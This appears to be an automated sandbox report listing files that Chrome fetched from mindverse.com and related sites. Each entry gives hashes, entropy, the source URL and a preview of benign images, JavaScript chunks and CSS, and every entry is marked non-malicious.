                                      File Type:SVG Scalable Vector Graphics image
                                      Category:downloaded
                                      Size (bytes):20902
                                      Entropy (8bit):6.023435901450703
                                      Encrypted:false
                                      SSDEEP:384:jvmhXc0LiV2wcPed1cb9LQpe7jLlIqL0nBsFu0nm5PxrGHA+yIVUhrYK086od:jvmhwVpF2b9LQpMLuPo85PxXs6ho83d
                                      MD5:3BBF9CF5998E93B76C9B48C644536133
                                      SHA1:C2EF640F96CCB6DA215DBB7769C231F2BC1BFC31
                                      SHA-256:233947C85AC7AF3CE0CD5DA5A29B65241A8DA4F5FCB48CE98B2A1A22162F9090
                                      SHA-512:EBC069171B71EF61CCC56E72AEBFEC6423C082B3644776D9A97FF84759C3536EDB91991BECDEBD46149E3A2909025DBF53FBD3F23F4B23F1D7A1783C77B61EB4
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/assets/onboarding/get_Insights.svg
                                      Preview:<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" fill="none" version="1.1" width="123.60000610351562" height="48" viewBox="0 0 123.60000610351562 48"><defs><pattern x="0" y="0" width="123.60000610351562" height="48" patternUnits="userSpaceOnUse" id="master_svg0_34090_089497"><image x="0" y="-0.0000011851486654279597" width="123.60000610351562" height="48.00000237029733" xlink:href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAgMAAADICAYAAAB1a+IJAAAAAXNSR0IArs4c6QAAAARzQklUCAgICHwIZIgAACAASURBVHic7b19kCP3ed/5eX7dDcz77nJJLkmJEi1qSVoUY1uUZZKyw9myzjJJ20zJWcq6K0eiU5ESW050lq1LnR1zVlWXuvJZd4rtpFK+2JSc1CnkxrrIZ5Inl3I7vFwoVSz6TVyK5NISLVIkl/u+szMDoPv3e+6P7sZgsJgXzAADzMzzUUHANIBGz3LQv29/nzfBWJMnHtbpANPlzyLc3eFl0x22zbZvUOVJAFc8d8+DctlrDMMwdjP6xB3Tl210Lt8Wwmz7U3LP1y7bZnSHDPoAhonHHtaZ8nGx4E9v0UfPQi4UTCQYhrHT0SfumG4u7gCid6M9Ot9Ky0WYypOleDDBsDq7WgyUi78IDw34UDoxCyDKETBxYBjG9qS58Pdywd8opVDwegRMILSyq8RAy+K/lVf9vWIWcnFgwsAwjGFl+VW/DuOF1hImDprseDEw5Ff/m2HWhIFhGMOAfvmumeL
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:GIF image data, version 89a, 1500 x 1500
                                      Category:downloaded
                                      Size (bytes):18391261
                                      Entropy (8bit):7.92549159103102
                                      Encrypted:false
                                      SSDEEP:393216:IdWKXKXKXKXKXKXKXKXKXKXKXKXKXKXKXKXKXKXKXKXKXKXKXKXKXKXKXKXKXKXw:FKXKXKXKXKXKXKXKXKXKXKXKXKXKXKXt
                                      MD5:91CB327F2E3688E1BF4E4AB2F8315DC9
                                      SHA1:3539A91624C57F0497F3D0748A9EC05980D7A770
                                      SHA-256:8FC48E857A97CA0A6CC325729858A2340932EC445A1E265788F6FC969F114756
                                      SHA-512:8540C627A1E18C9C9E09C34FDAA89771705ECBE06F07E7AC793004CD4F67E8B85146E0BCA2C7E854090F3DAC2EDA5439A08FE1372ACC88153B8473CF600993E9
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-img/crm/1736841004165/gif-3.gif
                                      Preview:GIF89a.......L5-`X....-d{!.....J]..&..c........P*.......yy{.......+..x.~mP........uxVK._...f^@...e:1wyg.D)vo..b0zvE.n.LghzSO0.k....d9.Vk3..kW4..('"...1))...=**2) 3!!>).tjZ...<4(d;S...?23vif1.2..........hnAwJ=......hfVQ>;hegaNAfWVvos............R>9>J...aXf.N@.dR....bBvV[...PNL....ow.pf.........YS...KSi....u..c..xZUV.iPx....a.aB*.x.....4...}D.vC#.IO....*.yW.r`..L>.xE..............!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.1462899777, 2023/06/25-23:57:14 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 25.3 (Macintosh)" xmpMM:InstanceID="xmp.iid:FC0562B6CA6F11EF96F2C797EE89DF01" xmpMM:DocumentID="xmp.did:FC0562B7CA6F11EF96F2C797EE89DF01"> <xmpM
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):18
                                      Entropy (8bit):3.5724312513221195
                                      Encrypted:false
                                      SSDEEP:3:uZuUeB:u5eB
                                      MD5:53AF239EE5D3E261545DEDEDCB6FFD57
                                      SHA1:04CA7E137E1E9FEEAD96A7DF45BB67D5AB3DE190
                                      SHA-256:99EB12F2AB3C4866A353E098FFA3CB7A967E617C49B98480394EC5D8EA92B094
                                      SHA-512:C734E4A5FF5D335A91518DBF47861BDAF8012AF49371DCD2E3350E269C9A5A1CC094114D17C4F5B053F3757B4B07487EBD0D309C91EF97ACF4665CC5D5C9A2D3
                                      Malicious:false
                                      Reputation:low
                                      Preview:404 page not found
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                      Category:downloaded
                                      Size (bytes):95634
                                      Entropy (8bit):5.432755998155924
                                      Encrypted:false
                                      SSDEEP:1536:XyPumg9tEII4KwKwjdVPMndP9k3hyg6m6Fqes1N:F97rxhVPu06m1N
                                      MD5:2F56DC8EF74DFB91AB89F8754C340565
                                      SHA1:F09662EF74C8E987EC8211C42DF34C3AEF1DC512
                                      SHA-256:506B30A57E87245DE7C4268F04F2AD2EC2AE2306C6CF3D99D5F314ABD839B627
                                      SHA-512:9A6244C4E7CC0357A3B3B76380FF90D98254757B513AF46016D763B56BC67539082B55C951ED8702DCE116E32CC3528D7D552435013207F7BCA8E41CC663DF76
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/chunks/5681-43d82f1a3d805e0d.js
                                      Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[5681],{30772:function(e,t,r){"use strict";r.r(t),r.d(t,{blue:function(){return Z},cyan:function(){return k},geekblue:function(){return w},generate:function(){return f},gold:function(){return m},gray:function(){return A},green:function(){return x},grey:function(){return O},lime:function(){return S},magenta:function(){return E},orange:function(){return b},presetDarkPalettes:function(){return p},presetPalettes:function(){return h},presetPrimaryColors:function(){return d},purple:function(){return C},red:function(){return g},volcano:function(){return v},yellow:function(){return y}});var n=r(59916),o=r(63945),i=[{index:7,opacity:.15},{index:6,opacity:.25},{index:5,opacity:.3},{index:5,opacity:.45},{index:5,opacity:.65},{index:5,opacity:.85},{index:4,opacity:.9},{index:3,opacity:.95},{index:2,opacity:.97},{index:1,opacity:.98}];function a(e){var t=e.r,r=e.g,o=e.b,i=(0,n.py)(t,r,o);return{h:360*i.h,s:i.s,v:i.v}}function c(e){var t=e.r,r=
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:downloaded
                                      Size (bytes):64
                                      Entropy (8bit):4.740168898701708
                                      Encrypted:false
                                      SSDEEP:3:vULei3+cBx31MKfkcy9J+WrY:+N3B7WM
                                      MD5:FDE7B0A7EB586EC3046E3B164B6A87E7
                                      SHA1:015FAA3F4737924BB361D3A9A8487E563D71DC0F
                                      SHA-256:1F4C56048A8E90759B47DFB7A4C0DB2EE97D8B0CE47B650C108FEBF3EAA9992B
                                      SHA-512:82B9A1D426A25A29E7F092B44B89AA76FA9CB61A27A0D066ADD7B889758CDFD3A6874DFC8DF1840FC61330FB17638CF6ECBB67497844DE31554501F5141B0B50
                                      Malicious:false
                                      Reputation:low
                                      URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIgCRhKGf5vPrkDEgUNeG8SGRIFDc5BTHohEmJRU3s0qFk=?alt=proto
                                      Preview:CiwKCw14bxIZGgQIVhgCCh0NzkFMehoECEsYAioQCApSDAoCQCEQARj/////Dw==
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (10913), with no line terminators
                                      Category:downloaded
                                      Size (bytes):10913
                                      Entropy (8bit):5.589548244012447
                                      Encrypted:false
                                      SSDEEP:192:O7/b0Fu7BFuM4oyybrvRPpZ2KK0W9qZdcoGgS+vY6:O7j0suM4orXBpbmkRGgS+3
                                      MD5:C2F4E452B2BF74F02AAE2E759491D56B
                                      SHA1:B4E11D178A7F6B6077F6F758196C7BE0CEC6CF7B
                                      SHA-256:AB2D177C6F51E0D1B0DD4B02EC57AA8242F86E7BA8BE4B91185DAEFC8BB84BDF
                                      SHA-512:D2D81F497E19FC19271ECA0F44E63966D4ADC599BE37E501EDC106CB744C55B80DD703EE8A8DB08449904D9662095678D73F9F7C32F823FD1FC5B7214B37EC58
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/chunks/app/(layout)/public/%5Btoken%5D/page-00158f1b974060c8.js
                                      Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[7111,9747],{97307:function(e,t,n){Promise.resolve().then(n.bind(n,88541))},6359:function(e,t,n){"use strict";var a=n(57437),o=n(76345),r=n(9772),s=n.n(r);t.Z=e=>{let{className:t}=e;return(0,a.jsxs)("div",{className:s()("overflow-hidden space-y-10 mt-8 mx-20",t),children:[(0,a.jsx)(o.Z,{active:!0}),(0,a.jsx)(o.Z,{active:!0}),(0,a.jsx)(o.Z,{active:!0})]})}},81648:function(e,t,n){"use strict";n.d(t,{p:function(){return a}});let a="/default_logo.svg"},35986:function(e,t,n){"use strict";n.d(t,{J:function(){return o}});var a=n(57437);let o=(0,n(2265).createContext)({});t.Z=function(e){let{detailInfo:t,children:n}=e;return(0,a.jsx)(o.Provider,{value:t,children:n})}},22465:function(e,t,n){"use strict";n.d(t,{Z:function(){return r}});var a=n(2265),o=n(35986);function r(){return(0,a.useContext)(o.J)}},73634:function(e,t,n){"use strict";var a=n(2265),o=n(90884),r=n(79199);t.Z=e=>{let{failCallback:t,failRedirect:s}=e||{},[i,l]=(0,a.useState)
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (32940), with no line terminators
                                      Category:downloaded
                                      Size (bytes):32940
                                      Entropy (8bit):5.287377115497433
                                      Encrypted:false
                                      SSDEEP:768:JYswxGhIDBjk/eP67O/WhSLhxttV1tuadgWS+Z:JYswohqBjk/eP67cMWxttV1ndgWS+Z
                                      MD5:46AA8A332FE1A15267231056D24EFFC1
                                      SHA1:CC66D0E538C3AD7FBA3595532AB22FE73881EBB6
                                      SHA-256:592414FD4E791B2A4DAC9089E6AF23E75B722EE846569CDB2606CC8B5BD05838
                                      SHA-512:5613A8CF02D4549110CCE8C50F754BA34F3EA3842E9BA466F50038626D9E04613D9574311EDC0E9D95FCCF956AD56D74A37DC4620D10ADEE7289B91086B42853
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/chunks/4306-7a0460b5a31d4d61.js
                                      Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4306],{73063:function(e,t,r){r.d(t,{Z:function(){return a}});var o=r(83590),n=r(2265),l={icon:{tag:"svg",attrs:{viewBox:"64 64 896 896",focusable:"false"},children:[{tag:"path",attrs:{d:"M747.4 535.7c-.4-68.2 30.5-119.6 92.9-157.5-34.9-50-87.7-77.5-157.3-82.8-65.9-5.2-138 38.4-164.4 38.4-27.9 0-91.7-36.6-141.9-36.6C273.1 298.8 163 379.8 163 544.6c0 48.7 8.9 99 26.7 150.8 23.8 68.2 109.6 235.3 199.1 232.6 46.8-1.1 79.9-33.2 140.8-33.2 59.1 0 89.7 33.2 141.9 33.2 90.3-1.3 167.9-153.2 190.5-221.6-121.1-57.1-114.6-167.2-114.6-170.7zm-105.1-305c50.7-60.2 46.1-115 44.6-134.7-44.8 2.6-96.6 30.5-126.1 64.8-32.5 36.8-51.6 82.3-47.5 133.6 48.4 3.7 92.6-21.2 129-63.7z"}}]},name:"apple",theme:"filled"},i=r(97009),a=n.forwardRef(function(e,t){return n.createElement(i.Z,(0,o.Z)({},e,{ref:t,icon:l}))})},52735:function(e,t,r){r.d(t,{Z:function(){return a}});var o=r(83590),n=r(2265),l={icon:{tag:"svg",attrs:{viewBox:"64 64 896 896",f
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (1475), with no line terminators
                                      Category:downloaded
                                      Size (bytes):1475
                                      Entropy (8bit):5.788470067541392
                                      Encrypted:false
                                      SSDEEP:24:2jkm94/zKPccAgnHs+KVCe2TLph9gFB5vtADjkrDQndcl/1t4glvllLty1gA1sLc:VKEcznfKo7LmvtUjPKtX7I1HSLrwUnG
                                      MD5:1B0B9B0C321562572E244EB589574700
                                      SHA1:B6F1BAE6F03C0488065A871DDD4687CAA47C54DE
                                      SHA-256:DE9CF6D96D7D8D11871925C40F6D820064A28C0FA9C770A015CB7717E608EC67
                                      SHA-512:D884F5282C66A6690070E0FCA4BEF2CAD36E0A395724629CCDC2D5661C335F7AD8FF88DDD42BDDD80A5353DFAAB6B4091A57A8866C87F527D65AB10A4A0511B4
                                      Malicious:false
                                      Reputation:low
                                      URL:https://www.google.com/recaptcha/api.js
                                      Preview:/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.google.com/recaptcha/api2/';(cfg['render']=cfg['render']||[]).push('onload');(cfg['clr']=cfg['clr']||[]).push('true');w['__google_recaptcha_client']=true;var d=document,po=d.createElement('script');po.type='text/javascript';po.async=true; po.charset='utf-8';var v=w.navigator,m=d.createElement('meta');m.httpEquiv='origin-trial';m.content='A/kargTFyk8MR5ueravczef/wIlTkbVk1qXQesp39nV+xNECPdLBVeYffxrM8TmZT6RArWGQVCJ0LRivD7glcAUAAACQeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZzIiLCJleHBpcnkiOjE3NDIzNDIzOTksImlzU3ViZG9tYWluIjp0cnVlLCJpc1RoaXJkUGFydHkiOnRydWV9';if(v&&v.cookieDeprecationLabel){v.cookieDeprecationLabel.getValue().then(function(l){if(l!=='treatment_1.1'&&l!=='treatment_1
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (6311)
                                      Category:downloaded
                                      Size (bytes):10371
                                      Entropy (8bit):5.368661168570967
                                      Encrypted:false
                                      SSDEEP:96:4FfrQtxNzLpQom+0I3wk2hWfJrdzmQWsu6yv4KEqXsbPUAf/5XnG:Wfry0jEqiRG
                                      MD5:B0A87F2B037D50680975A77031E40DC2
                                      SHA1:3A6286D98E6BD05EDCF3A7D63977C7245C4D0CF8
                                      SHA-256:4D5A4FE40768BAB8E8CDDEE38C1F2D7C3A9D0AB7ED2E4C0E073A4E10CEE9C4E8
                                      SHA-512:1AA197DDF1D42D15C482CE663127429C32503303D3229E88F15D4AB5B9404068E665E80110216E941C7FD1D8D872459A7A7257AE566932114EAD67FB5009AC88
                                      Malicious:false
                                      Reputation:low
                                      URL:https://app.me.bot/login?_rsc=1msj7
                                      Preview:2:I[66513,[],"ClientPageRoot"].3:I[53383,["8252","static/chunks/4b1a69f1-da174b537a3b105c.js","7487","static/chunks/49a1bf4b-d76374957333b5fc.js","595","static/chunks/595-09c9610e33be8fcc.js","5681","static/chunks/5681-43d82f1a3d805e0d.js","3122","static/chunks/3122-1f6938ed37fcf02d.js","4653","static/chunks/4653-73048479d8c69d09.js","6219","static/chunks/6219-1457be36132bf9c6.js","1073","static/chunks/1073-e4f77f384144a1c4.js","9818","static/chunks/9818-2cef5ca4ed1a1e3a.js","6701","static/chunks/6701-3887d30af462f285.js","4595","static/chunks/4595-19c1c19690f67e9a.js","6494","static/chunks/6494-ed88a2adc46e7b33.js","4871","static/chunks/4871-53f67f62764665d5.js","114","static/chunks/114-d3df8482d6fc925d.js","5204","static/chunks/5204-55e577bed4f36b3d.js","7513","static/chunks/app/(nolayout)/login/page-8c894cabcf8ca401.js"],"default",1].4:I[39275,[],""].5:I[61343,[],""].6:I[10804,["5681","static/chunks/5681-43d82f1a3d805e0d.js","2973","static/chunks/2973-d52b6c4a073fa583.js","3124","st
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text
                                      Category:downloaded
                                      Size (bytes):29
                                      Entropy (8bit):3.9353986674667634
                                      Encrypted:false
                                      SSDEEP:3:VQAOx/1n:VQAOd1n
                                      MD5:6FED308183D5DFC421602548615204AF
                                      SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                      SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                      SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                      Malicious:false
                                      Reputation:low
                                      URL:https://www.google.com/async/newtab_promos
                                      Preview:)]}'.{"update":{"promos":{}}}
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (5788), with no line terminators
                                      Category:downloaded
                                      Size (bytes):5788
                                      Entropy (8bit):5.450614601234393
                                      Encrypted:false
                                      SSDEEP:96:1dagnEljVLnXZHLExywFKY8L+xeVROW0DeZ6XfmyGGT6:1sgEnVHycPL97OLDeZ6eyGa6
                                      MD5:C74EF9861D5A574418A028E10D546842
                                      SHA1:0BF550DD705B22F042086DEB8AA103FEED50D324
                                      SHA-256:CDDB699309A123D45109BA5AB3D6AFAF3ED7037F1625583B79F1A35392860C22
                                      SHA-512:316520553B16B805AD9C883AFD30903AC1823477D518C489CE3F6EC82496F6EFB13C639C7104563D169BE6FF8914A0BAD3305AD5700132D57C4AFD2E2A242FE0
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/chunks/app/(mobileLayout)/layout-49b8bc0c723e6f2e.js
                                      Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[6763],{620:function(e,t,n){Promise.resolve().then(n.bind(n,86954))},86954:function(e,t,n){"use strict";n.r(t);var r=n(57437),i=n(7193),o=n(43189),s=n(75002);t.default=function(e){let{children:t}=e;return(0,r.jsx)(i.Z,{children:(0,r.jsx)(o.Z,{children:(0,r.jsx)(s.Z,{children:t})})})}},7193:function(e,t,n){"use strict";var r=n(57437),i=n(12973),o=n(16463);t.Z=e=>{let{children:t}=e,n=(0,i.Df)();return(0,o.useServerInsertedHTML)(()=>(0,r.jsx)("style",{dangerouslySetInnerHTML:{__html:(0,i.EN)(n,!0)},id:"antd"})),(0,r.jsx)(i.V9,{cache:n,children:t})}},13265:function(e,t,n){"use strict";let r=(0,n(2265).createContext)({});t.Z=r},43189:function(e,t,n){"use strict";var r=n(57437),i=n(2265),o=n(81704);t.Z=function(e){let{children:t}=e,n=(0,i.useMemo)(()=>new o.Q,[]);return(0,r.jsx)(o.Z.Provider,{value:n,children:t})}},75002:function(e,t,n){"use strict";n.d(t,{Z:function(){return L}});var r=n(57437),i=n(74259),o=n(20056),s=n(46934),a=n(8654
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (25811), with no line terminators
                                      Category:downloaded
                                      Size (bytes):25811
                                      Entropy (8bit):5.320273847560869
                                      Encrypted:false
                                      SSDEEP:768:FNdor6vZ93D16vm/zO8JMoyi1VG+QffREV:FNdora//zO8JMoyi1VG+QffREV
                                      MD5:68ED27677D5DC4117E1784071D921FBF
                                      SHA1:BB59BD0E98C41CAC541F186EFD52EA7A2D2F3667
                                      SHA-256:5A49AA23AC16E18BF066777B8607E88B31AE8CA7B034AF0B3A5A34EDF0227AEE
                                      SHA-512:1C1F84E08D990B0F18FC3339E983E72648822848FD03B517BDE1F69FAE142385232B491AC7D0E513D6D1018466CDD1322464A378C0E18967A3F006BA8748E3C1
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/chunks/4653-73048479d8c69d09.js
                                      Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4653],{76415:function(t,o,e){e.d(o,{M2:function(){return a},Tm:function(){return l},l$:function(){return c}});var n,r=e(2265);let{isValidElement:c}=n||(n=e.t(r,2));function a(t){return t&&c(t)&&t.type===r.Fragment}function l(t,o){return c(t)?r.cloneElement(t,"function"==typeof o?o(t.props||{}):o):t}},50511:function(t,o,e){e.d(o,{Z:function(){return x}});var n=e(9772),r=e.n(n),c=e(17492),a=e(8461),l=e(2265),i=e(38750),s=e(76415),d=e(29706);let u=t=>{let{componentCls:o,colorPrimary:e}=t;return{[o]:{position:"absolute",background:"transparent",pointerEvents:"none",boxSizing:"border-box",color:"var(--wave-color, ".concat(e,")"),boxShadow:"0 0 0 0 currentcolor",opacity:.2,"&.wave-motion-appear":{transition:["box-shadow 0.4s ".concat(t.motionEaseOutCirc),"opacity 2s ".concat(t.motionEaseOutCirc)].join(","),"&-active":{boxShadow:"0 0 0 6px currentcolor",opacity:0},"&.wave-quick":{transition:["box-shadow 0.3s ".concat(t.moti
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (1334), with no line terminators
                                      Category:downloaded
                                      Size (bytes):1334
                                      Entropy (8bit):5.070035846852951
                                      Encrypted:false
                                      SSDEEP:24:+qAM8V35qnptxYhfSqnp4n+NX8VgVGd2jfgCM8V3TAtxYhfHA3WD+bAz9:+kMpgYhq5QM9M0YhPp
                                      MD5:C2C312BE01F873B2F91545150421C24C
                                      SHA1:6AB10B40790472BE6EC0104B07F18FF76B780FE4
                                      SHA-256:F51E376A6BEB442E7B5DF616CBEFEEA9A972D91891061C08576F506C8CC97AF5
                                      SHA-512:75BF4B0A52A8EDB5FCDF198976490DDA5BDBA6B019280CFCDB4925BB06884AAB08C94E61CCCBDC8A98A4C4F1E30509349B8C5009D61947CD331AA599B929CB7F
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/css/eea73c25cb4c35c7.css
                                      Preview:.index_header__Fvskd{display:flex;flex-direction:row;gap:12px;align-items:center;align-self:stretch;justify-content:center;height:32px}.index_header__Fvskd .index_title__W4Lsq{flex:1;color:#160a0a;font-weight:400;font-size:24px;font-family:Calistoga-Regular,sans-serif;line-height:32px}.index_header__Fvskd .index_search__snoAd{display:flex;flex-direction:row;width:200px;height:32px;border:0;border-radius:8px}.index_newButton___chLh{display:flex;flex-direction:row;gap:4px;align-items:center;height:28px;margin-left:12px;padding:0 10px 0 8px;color:var(--primary-white);font-size:12px;font-family:Helvetica Neue,sans-serif;line-height:20px;background:#160a0a;border-radius:8px;cursor:pointer;transition:background-color .2s}.index_newButton___chLh:hover{background-color:var(--primary-sub-color)}.index_mobileHeader___QBgd{display:flex;flex-direction:column;gap:12px;align-items:center;align-self:stretch;justify-content:center}.index_mobileHeader___QBgd .index_title__W4Lsq{flex:1;color:#160a0a;fon
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:GIF image data, version 89a, 1500 x 1500
                                      Category:downloaded
                                      Size (bytes):7864277
                                      Entropy (8bit):7.939170466774865
                                      Encrypted:false
                                      SSDEEP:98304:qotgpldq1ohP622mObDRU1BQnXzIZ81arVhhzcX4f7x3M7nhEh:qo2plA1Ki2eWPjm1izcIf7x3c8
                                      MD5:B26B552E32581E111E01F111A25346CA
                                      SHA1:B9775B429FDC43E9E8A20234F256B5C51B5478EF
                                      SHA-256:15CA2776D7888287ADCC72F47C95D082D4984A2A0EF258E685D091387175FE88
                                      SHA-512:147A5F11D8F71B66D024A397B2535D13C3C7CA070D91D39A130E6EF8AC420FABCC5B5DFF9932968DA729E763D5E87421956F81165CA5CCB32202F77D456BC955
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-img/crm/1736845050141/gif-1.gif?number=2
                                      Preview:GIF89a...........eoN....k.hUm]L...XR/:D,.....R..NXL..l..e..U.N...R3GC..w.n2..]0.Y.}W.y^...T2..>.z&.T..^3..O....3.v.vM}F$...........e....p..w...................f....jF............jM....`E..x....y..^.........+1*...eB..ke.?.x..{9..._pji.T.z^kso|.@.c...|..Oyj^...vH.Q....~Un9.._.i...x.N........h...x..d..J.x.g.......V..Q..a..!.....j.........g.hy}[.i..{@...........!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.1462899777, 2023/06/25-23:57:14 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 25.3 (Macintosh)" xmpMM:InstanceID="xmp.iid:ADA50707CA7611EF94A5E80A6F57A235" xmpMM:DocumentID="xmp.did:ADA50708CA7611EF94A5E80A6F57A235"> <xmpM
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:Unicode text, UTF-8 text, with very long lines (39590), with no line terminators
                                      Category:downloaded
                                      Size (bytes):39594
                                      Entropy (8bit):5.284626517818974
                                      Encrypted:false
                                      SSDEEP:768:sfmjp7FczrLACTYp1ZmwriWqKr3GuqHWeMw:s+jp7FurkCcp1swaKgL
                                      MD5:64CED0C00CAA66C6F381B38FBA2532D9
                                      SHA1:4D299268CAE4BD06FA7ED90A11FC4A057878B5D0
                                      SHA-256:DCCAE8F00DAE19D80CA90C8A6E015747CCBBB5D9CC20BC5EFB3142DDF4CA5696
                                      SHA-512:E98D30AF465CEE3923D4AF083393610EDF172BBED9A0CE0990DF774B0E295271381E3F121739279A17A1213FFAC460EA75D70D2BA080FD220F91661FB9721521
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/chunks/4871-53f67f62764665d5.js
                                      Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4871],{14871:function(e,t,n){"use strict";n.d(t,{Z:function(){return ek}});var i=n(2265),r=n(22988),o=n(42897),l=n(82546),a=n(84179),s=n(41088),c=n(11328),d=n(33542),u=n(12475),p=n(8620),f=n(83627),h={animating:!1,autoplaying:null,currentDirection:0,currentLeft:null,currentSlide:0,direction:1,dragging:!1,edgeDragged:!1,initialized:!1,lazyLoadedList:[],listHeight:null,listWidth:null,scrolling:!1,slideCount:null,slideHeight:null,slideWidth:null,swipeLeft:null,swiped:!1,swiping:!1,touchObject:{startX:0,startY:0,curX:0,curY:0},trackStyle:{},trackWidth:0,targetSlide:0},v=n(56976),g=n(9772),S=n.n(g);function y(e,t,n){return Math.max(t,Math.min(e,n))}var k=function(e){["onTouchStart","onTouchMove","onWheel"].includes(e._reactName)||e.preventDefault()},m=function(e){for(var t=[],n=Z(e),i=w(e),r=n;r<i;r++)0>e.lazyLoadedList.indexOf(r)&&t.push(r);return t},Z=function(e){return e.currentSlide-b(e)},w=function(e){return e.currentSlide+T(e)},
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:HTML document, ASCII text, with very long lines (65364)
                                      Category:downloaded
                                      Size (bytes):195723
                                      Entropy (8bit):4.714911928017247
                                      Encrypted:false
                                      SSDEEP:1536:a3m+RggkkkVUTpN3NztICDElYIplo3m+RggkkkVUTpN3NztICDElYIplHLBLqLB/:7+W9U9NdnO+W9U9Ndnw+/
                                      MD5:D8F9BD13C5DEC712F4C15C98629B6920
                                      SHA1:4F7C5236F959F78C6DB57F5C9C51BF2AB1C60B23
                                      SHA-256:34D953A6EAD0FEED4D5027137FCA01629F87ED371F1E1864D0BA3EED7AC81E06
                                      SHA-512:8009CD07EC3EE76E8FF06A45C0FEC9927D8353C70833076C20A072A18731A4DEF0179470C5E9B4AB13318C68F4E2D8923E56977A8F6D635621BDCB5D4949855C
                                      Malicious:false
                                      Reputation:low
                                      URL:https://cpg.aleonanob.ru/CqUns/
